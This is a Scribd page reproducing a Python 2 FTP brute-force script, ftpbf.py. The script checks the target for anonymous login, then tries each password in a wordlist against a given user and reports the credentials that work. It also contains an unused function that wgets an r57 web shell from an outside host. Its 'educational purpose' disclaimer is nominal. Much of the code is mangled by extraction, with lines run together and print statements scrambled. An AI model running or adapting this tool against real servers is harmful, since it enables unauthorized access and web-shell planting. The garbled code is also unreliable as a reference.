Scribd
Upload
74 views

Ftpbrute Py

The document appears to be a Python script that performs FTP brute force attacks. It takes target IP/hostname, username, and password wordlist file as arguments. It first checks for anonymous login, then systematically tries login combinations with the given username and each password in the wordlist file. If a successful login is found, it prints the credentials that worked.

Uploaded by

Alexander Bonaparte Cruz
Copyright
© Attribution Non-Commercial (BY-NC)
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
74 views

Ftpbrute Py

The document appears to be a Python script that performs FTP brute force attacks. It takes target IP/hostname, username, and password wordlist file as arguments. It first checks for anonymous login, then systematically tries login combinations with the given username and each password in the wordlist file. If a successful login is found, it prints the credentials that worked.

Uploaded by

Alexander Bonaparte Cruz
Copyright
© Attribution Non-Commercial (BY-NC)
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 3

#!/usr/bin/python # This was written for educational purpose and pentest only. Use it at your own risk.

# Author will be not responsible for any damage! # !!! Special greetz for my friend sinner_01 !!! # Toolname : ftpbf.py # Coder : baltazar a.k.a b4ltazar < [email protected]> # Version : 0.1 # About : # Greetz for rsauron and low1z, great python coders # greetz for d3hydr8, qk, marezzi, StRoNiX, t0r3x, fx0, TraXdata, v0da and all m embers of ex darkc0de.com, ljuska.org and rev3rse.org # # # Example of use : ./ftpbf.py -t ftp.server.com -u baltazar -w words.txt # After scanning check ftpbf.txt for more info (in next version) import sys, os, time from ftplib import FTP if sys.platform == 'linux' or sys.platform == 'linux2': clearing = 'clear' else: clearing = 'cls' os.system(clearing) R = "\033[31m"; G = "\033[32m";

def logo(): print ---|" print " print " print " print " print " print \n" print

G+"\n|-----------------------------------------------------------"| "| b4ltazar[@]gmail[dot]com "| 02/2011 ftpbf.py v.0.1 | | | | |

"| FTP Brute Forcing Tool "|

"|---------------------------------------------------------------| "\n[-] %s\n" % time.strftime("%X")

def help(): logo() print R+"-t, --target ip/hostname <> Our target" print "-u, --user user <> Our user" print "-w, --wordlist wordlist <> wordlist path" print "-h, --help help <> print this help" print "ex: ./ftpbf -t ftp.server.com -u baltazar -w passwords.txt" sys.exit(1) for arg in sys.argv: if arg.lower() == '-t' or arg.lower() == '--target': hostname = sys.argv[int(sys.argv[1:].index(arg))+2]

elif arg.lower() == '-u' or arg.lower() == '--user': user = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-w' or arg.lower() == '--wordlist': wordlist = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-h' or arg.lower() == '--help': help() elif len(sys.argv) <= 1: help() logo()

def bf(p): sys.stdout.write("\r[!]Checking : %s " % (p)) sys.stdout.flush() try: ftp = FTP(hostname) ftp.login(user, p) ftp.retrlines('list') ftp.quit() print R+"\n[!] w00t,w00t!!! We did it ! " print "[+] Target : ",hostname, "" print "[+] User : ",user, "" print "[+] Password : ",p, "" sys.exit(1) except Exception, e: pass except KeyboardInterrupt: print "\n[-] Exiting ...\n" sys.exit(1) def anon(): try: print "\n[!] Checking for anonymous login\n" ftp = FTP(hostname) ftp.login() ftp.retrlines('LIST') print R+"\n[!] w00t,w00t!!! Anonymous login successfuly !\n" ftp.quit() except Exception, e: print G+"\n[-] Anonymous login unsuccessful...\n" pass def shell(): os.system("wget http://hmvhotels.com/unaesthetically/r57.txt") if commands.getoutput("ls") != "r57.txt": print "Sorry cant upload shell" else: print "w00t,w00t!!! Shell up" print "[!] BruteForcing target ..." anon() try: passwords = open(wordlist, "r") pwd = passwords.readlines() count = 0 while count < len(pwd): pwd[count] = pwd[count].strip() count +=1

except(IOError): print "\n[-] Check your wordlist path\n" sys.exit(1) print print print print for p G+"\n[+] Loaded:",len(pwd),"passwords" "[+] Target:",hostname "[+] User:",user "[+] Guessing...\n" in pwd: bf(p.replace("\n",""))

You might also like